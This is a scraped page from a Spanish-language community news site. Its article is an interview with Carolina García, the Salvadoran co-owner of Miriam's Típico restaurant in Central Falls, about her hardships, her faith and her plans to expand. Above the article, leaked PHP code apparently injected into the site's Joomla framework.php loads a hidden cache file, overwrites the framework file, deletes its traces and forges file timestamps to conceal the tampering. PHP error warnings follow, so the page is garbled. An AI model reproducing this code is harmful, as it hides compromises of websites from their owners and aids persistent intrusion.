$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 426
Carolina García, propietaria de Miriam’s Típico: “Mi sueño es abrir una cadena de restaurantes”

ACONTECER LATINO

Tuesday, Sep 19th

Ultima actualizacion:06:42:24 AM GMT

Estas en: PRIMERA PLANA

Carolina García, propietaria de Miriam’s Típico: “Mi sueño es abrir una cadena de restaurantes”

Imprimir PDF

miriam

CENTRAL FALLS, RI.- Prosperada, bendecida y en victoria. Así se define hoy la empresaria salvadoreña Carolina García, una joven luchadora y llena de fe, quien junto a su madre Mariam es propietaria del restaurante Miriam’s Típico, ubicado en el 744 Dexter Street, en Central Falls.

Pero su historia no siempre ha sido un cuento de hadas. Rebuscando en el pasado, mientras era entrevistada por ACONTECER LATINO, Carolina rememoró los momentos más difíciles y terribles que le tocó enfrentar a su llegada a los Estados Unidos, con apenas 20 años de edad, al dejar atrás una vida placentera y casi perfecta en su país.

Estudiante universitaria de Laboratorio Clínico en El Salvador, la joven empresaria decidió un buen día, en el año 2002, dejar sus estudios y probar suerte en suelo norteamericano, sin siquiera imaginar el infierno que le esperaba.

“Nunca había venido a este país y el cambio fue muy difícil. No sabía el idioma y esa fue mi primera limitación. Además, la visión que tenía en el Salvador de este país era muy diferente a lo que encontré cuando llegué. Todo el mundo piensa que es más fácil conseguir el dinero, pero cuando me di cuenta que tenía que trabajar en limpieza me dio mucha tristeza, después de haber estado en la universidad y tenerlo todo”, recuerda la madre de tres hijos.

Carolina cuenta que luego de varios meses trabajando en limpieza pasó a ser empacadora en una factoría. “Era un trabajo súper duro. Llegaba a la casa cansada y con los dedos destrozados. Recuerdo como ahora que los dedos me sangraban y el dolor era insoportable”.

alt

Tiempo después, aduce, empezó a comercializar con productos que exportaba desde Nueva York y vendía en tiendas, restaurantes y bodegas locales. “Era algo que me apasionaba”, asegura, “y me iba muy bien en el negocio”, refiere, pero tuvo que dejarlo.

“Yo tuve un caso fuerte de violencia doméstica por casi ocho años. Por eso dejé el negocio y me dediqué a estudiar Diseño Floral en Boston. Cuando recibí mi diploma, abrí una floristería, y seis meses después me asaltaron. Fue una experiencia horrible. Me apuntaron con una pistola en la cabeza y desde ese día quedé traumatizada”, relata Carolina.

Para ese entonces, señala la joven empresaria, ya tenía el restaurante, el cual adquirió junto a su madre. “Mi mamá venía de El Salvador y pensando en qué iba a trabajar aquí, porque yo no quería que ella sufriera todo lo que yo sufrí, decidí comprarlo con los ahorros de las dos. Juntas hemos logrado echar el restaurante para adelante. Hoy es un negocio estable, sostenible y con una clientela que nos respalda”.

El restaurante Miriam’s Típico sirve una variada gama de platos, pero su especialidad son las pupusas salvadoreñas. “Servimos comida típica de El salvador y Guatemala. Tenemos una amplia clientela. Realmente no podemos quejarnos”.

El negocio está creciendo, manifiesta Carolina, y su vida es como siempre soñó, y todo esto, asegura, se lo debe a la fe que tiene en Dios. “Dios es quien nos ha dado la sabiduría y la fuerza para seguir adelante. Gracias a Él estamos hoy aquí. Si Dios no hubiera estado en nuestra vida no hubiéramos podido lograr nada de esto porque nos aferramos a la fe de que él era quien nos iba a ayudar”.

Planes

Los sueños de crecer de Carolina son muchos, pero el más importante y que ocupa toda su atención es expandir el restaurante a otras ciudades. “Mi plan ahora mismo es conseguir un local comercial en Providence para expandir el restaurante. Me gustaría abrir otro restaurante Miriam’s Típico en Providence, pero mi sueño más grande es abrir una cadena de restaurantes”.

Mensaje

Carolina García aprovechó para enviar un mensaje de esperanza a todas las latinas en Rhode Island. “Que tengan fe. Yo soy cristiana y estoy convencida de que hay un Dios que aunque estemos solas, desamparadas, sufridas, El está allí siempre y nunca nos va a dejar. El siempre estará ahí y aunque a veces no vemos la salida, un día El nos va a dar la victoria, nos va a prosperar y nos va a sacar adelante”.